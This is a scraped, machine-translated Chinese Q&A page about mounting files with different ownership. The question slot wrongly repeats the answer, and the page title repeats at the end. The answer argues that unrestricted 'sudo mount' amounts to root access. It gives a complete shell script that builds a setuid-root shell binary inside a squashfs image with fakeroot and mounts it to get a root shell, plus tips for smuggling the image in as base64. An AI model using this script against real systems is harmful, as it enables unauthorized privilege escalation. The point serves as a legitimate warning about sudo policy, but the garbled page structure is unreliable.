是否可以挂载具有不同所有权/权限的文件？

Question

您规定允许您使用任何参数运行 sudo mount。在这种情况下，除非我误解了你的问题，否则获得 root 访问权限似乎非常容易：只需创建一个包含 setuid-root 二进制文件的磁盘映像并使用sudo mount -o loop!毕竟，任何人都可以创建磁盘映像，它只是字节......

为了证明这一点，这里有一个超级简单的 shell 脚本可以做到这一点：

#!/bin/sh

# Prepare the image
mkdir imgsrc
gcc -xc -o imgsrc/runsh - <<EOF
#include <unistd.h>
int
main(int argc, char **argv)
{
    execl("/bin/sh", "sh", NULL);
    return 1;
}
EOF

# Create the image
fakeroot sh -c 'chown -Rh 0:0 imgsrc; chmod u+s imgsrc/runsh; mksquashfs imgsrc img'
rm -rf imgsrc

# Mount the image
mkdir mountpoint
sudo mount -r img mountpoint

运行后，您只需运行即可获得 root shell mountpoint/runsh。

如果您没有必要的工具fakeroot，mksquashfs那么您可以简单地安装它们，它们的源代码是免费提供的。如果您不能这样做，那么您可以提前在其他地方创建映像并将其复制到相关系统上。如果情况变得更糟，您甚至可以对图像进行 Base 64 编码并将其粘贴到命令行！在我的系统上，上面的脚本生成一个压缩后只有 2600 字节的图像（多么有趣的巧合啊，它应该正是这个数字！），我确信只需一点点工作就可以将其变得更小。在过去（主要是 20 世纪 80 年代），人们习惯于手动输入比从编程杂志转录的数据更大的数据块。

Answer 1

您规定允许您使用任何参数运行 sudo mount。在这种情况下，除非我误解了你的问题，否则获得 root 访问权限似乎非常容易：只需创建一个包含 setuid-root 二进制文件的磁盘映像并使用sudo mount -o loop!毕竟，任何人都可以创建磁盘映像，它只是字节......

为了证明这一点，这里有一个超级简单的 shell 脚本可以做到这一点：

#!/bin/sh

# Prepare the image
mkdir imgsrc
gcc -xc -o imgsrc/runsh - <<EOF
#include <unistd.h>
int
main(int argc, char **argv)
{
    execl("/bin/sh", "sh", NULL);
    return 1;
}
EOF

# Create the image
fakeroot sh -c 'chown -Rh 0:0 imgsrc; chmod u+s imgsrc/runsh; mksquashfs imgsrc img'
rm -rf imgsrc

# Mount the image
mkdir mountpoint
sudo mount -r img mountpoint

运行后，您只需运行即可获得 root shell mountpoint/runsh。

如果您没有必要的工具fakeroot，mksquashfs那么您可以简单地安装它们，它们的源代码是免费提供的。如果您不能这样做，那么您可以提前在其他地方创建映像并将其复制到相关系统上。如果情况变得更糟，您甚至可以对图像进行 Base 64 编码并将其粘贴到命令行！在我的系统上，上面的脚本生成一个压缩后只有 2600 字节的图像（多么有趣的巧合啊，它应该正是这个数字！），我确信只需一点点工作就可以将其变得更小。在过去（主要是 20 世纪 80 年代），人们习惯于手动输入比从编程杂志转录的数据更大的数据块。

是否可以挂载具有不同所有权/权限的文件？

答案1

相关内容